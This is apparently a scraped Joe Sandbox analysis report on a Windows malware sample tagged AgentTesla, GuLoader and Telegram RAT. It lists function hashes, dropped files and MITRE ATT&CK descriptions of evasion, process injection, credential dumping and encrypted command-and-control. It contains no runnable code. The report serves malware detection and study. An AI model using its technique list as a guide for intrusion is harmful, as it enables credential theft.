Instruction Fuzzy Hash: DCE19634901368CFDB66EF60C98868EB775BF49319F1045EAD80AA3354DB325E86CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1D58E60F Relevance: 1.8, APIs: 1, Instructions: 277COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D58E798

Memory Dump Source

Source File: 0000000C.00000002.6151962074.000000001D580000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d580000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: faedb48acdd61abf33acf0d54b4885fa19c6cca45ef8df9c9487ec313d037a57
Instruction ID: 170587951d9b8ac296fb3a3e683f5b92a92b6ebda17693ef798306437c2a3d81
Opcode Fuzzy Hash: faedb48acdd61abf33acf0d54b4885fa19c6cca45ef8df9c9487ec313d037a57
Instruction Fuzzy Hash: CDE19634901368CFDB66EF60C98868EB775BF49319F1045EAD80AA3354CB325E86CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1D58E656 Relevance: 1.8, APIs: 1, Instructions: 270COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D58E798

Memory Dump Source

Source File: 0000000C.00000002.6151962074.000000001D580000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d580000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 00e7a0d68ace8878cf8a7e4f89b7037f33122ce3afd78e0d83f247c81092f84d
Instruction ID: 9b22440420e2db785667d534bbd3c6d8e16ad7ebdff5a69333f93136eb181679
Opcode Fuzzy Hash: 00e7a0d68ace8878cf8a7e4f89b7037f33122ce3afd78e0d83f247c81092f84d
Instruction Fuzzy Hash: 0AE19634905368CFDB66EF60C98868EB775BF49319F1045EAD80AA3354DB325E86CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1D58E69D Relevance: 1.8, APIs: 1, Instructions: 263COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D58E798

Memory Dump Source

Source File: 0000000C.00000002.6151962074.000000001D580000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d580000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b9ef257144b154b15bfc734e504634d2fa0b97b77c44b8a9a9ef0e28a6c8a400
Instruction ID: 971f7eb15b25d161b6b272cfc5d65492f65d80962cdf58d57e249cecb6283303
Opcode Fuzzy Hash: b9ef257144b154b15bfc734e504634d2fa0b97b77c44b8a9a9ef0e28a6c8a400
Instruction Fuzzy Hash: 47D18534905368CFDB66AF60C98868EB775BF49319F1045EAD80AA3354DB325EC5CF02

Uniqueness

Uniqueness Score: -1.00%

Function 1D58E6E4 Relevance: 1.8, APIs: 1, Instructions: 256COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D58E798

Memory Dump Source

Source File: 0000000C.00000002.6151962074.000000001D580000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d580000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f4f594910f89f4ba8a693746dac84c055c75f4fea5b863df1958e91a5828daea
Instruction ID: 1750c236be8c1d84f186c7c24ec3516e298734f2f8c43b9e37352edb3602b3e9
Opcode Fuzzy Hash: f4f594910f89f4ba8a693746dac84c055c75f4fea5b863df1958e91a5828daea
Instruction Fuzzy Hash: 8CD18534905368CFDB66AF60C98868EB775BF49319F1045EAD80AA3354DB325E86CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1D58E72B Relevance: 1.7, APIs: 1, Instructions: 249COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D58E798

Memory Dump Source

Source File: 0000000C.00000002.6151962074.000000001D580000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d580000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e936d04182af098385a3bdd153b20bd845a1f74ea160bc9de57b76e380f7c5da
Instruction ID: 3f27253f5e572985de08b6037b68a6341dea1f5fad7c07a6a502fd99e4383be7
Opcode Fuzzy Hash: e936d04182af098385a3bdd153b20bd845a1f74ea160bc9de57b76e380f7c5da
Instruction Fuzzy Hash: DED18534905368CFDB66EF60C98868EB775BF49319F1045EAD80AA3354DB365E86CF02

Uniqueness

Uniqueness Score: -1.00%

Function 1D58E772 Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 1D58E798

Memory Dump Source

Source File: 0000000C.00000002.6151962074.000000001D580000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d580000_CasPol.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7e6dbb5d4a6ab32e9662cb8d41a124c1bf71e3da756590eb15e090b182a5ebeb
Instruction ID: 7e02abf5054865cb60ed91f9edb1713942426b81cbcad91b252321950628b5fe
Opcode Fuzzy Hash: 7e6dbb5d4a6ab32e9662cb8d41a124c1bf71e3da756590eb15e090b182a5ebeb
Instruction Fuzzy Hash: 7AC19634905368CFCB66EF60C98868EB775BF49319F1085EAD80AA3354DB325E85CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1D21D3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6151003323.000000001D21D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D21D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d21d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e38b05429603e178703a50c2809a767fda1f8cc9c19530c597c78e9d1ab4e2a4
Instruction ID: a7cf9cf37296ed6f6222cfeea2d83bf03ab356bc7a566b12f822caa977478df7
Opcode Fuzzy Hash: e38b05429603e178703a50c2809a767fda1f8cc9c19530c597c78e9d1ab4e2a4
Instruction Fuzzy Hash: A3212871544245DFDB05EF18D9C0B17BBA1FB84324F20C569E9090F246C336E846CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D22E330 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6151176911.000000001D22D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D22D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d22d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2e032fc771807fd153057aad55b303f0268d610daaa6ea256afc197b0ec2ff6
Instruction ID: 6eb418a7182bda61ddca43581706865f2aa4d81d481fb31e47ac6568c6444dfe
Opcode Fuzzy Hash: e2e032fc771807fd153057aad55b303f0268d610daaa6ea256afc197b0ec2ff6
Instruction Fuzzy Hash: D1212671648245DFDB01DF10D9C0B2ABBA1FB84714F74C6ADF9494B242C336D946DB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D21D3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6151003323.000000001D21D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D21D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d21d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 377ad8ef0aacc23e00c33ed75b71cda2c385bc9219a56e12e2a0cf3716ab08ce
Instruction ID: 447682bf80e8a431d5631978d8da79973b1d0ae0b3a83b5bf7d68ebc61be7f3c
Opcode Fuzzy Hash: 377ad8ef0aacc23e00c33ed75b71cda2c385bc9219a56e12e2a0cf3716ab08ce
Instruction Fuzzy Hash: 5411BE76544285DFCB06DF14D9C4B16BFA2FB88320F34C5A9D8090B616C33AE45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D22E32B Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.6151176911.000000001D22D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D22D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1d22d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbbe9aef785076a0e14fe633b00917b0e10bb8e83b903b3e75bee6307ef43f6d
Instruction ID: 9dbdcf618c1d5d9559f106dbeaa85c91638f38a86a61ea5eb5ff4699be04a850
Opcode Fuzzy Hash: bbbe9aef785076a0e14fe633b00917b0e10bb8e83b903b3e75bee6307ef43f6d
Instruction Fuzzy Hash: 3311BB75544284CFCB01CF10D5C4B29BBA2FB84324F34C6AAE8494B656C33AD54ADB62

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Threatname: GuLoader

Threatname: Telegram RAT

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Adventure_12.bmp

C:\Users\user\AppData\Local\Temp\Lydabsorberende2.Eks

C:\Users\user\AppData\Local\Temp\Pilkedes4.AFM

C:\Users\user\AppData\Local\Temp\System.IO.UnmanagedMemoryStream.dll

C:\Users\user\AppData\Local\Temp\applications-utilities-symbolic.svg

C:\Users\user\AppData\Local\Temp\camera-photo-symbolic.symbolic.png

C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll

C:\Users\user\AppData\Local\Temp\resume-vm-default.bat

C:\Users\user\AppData\Local\Temp\wab32res.dll.mui

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Function 00403640 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 450
stringfilecomCOMMON

Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 74251BFF Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00406D5F Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 0040699E Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 004030D0 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 204
memoryCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004056CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre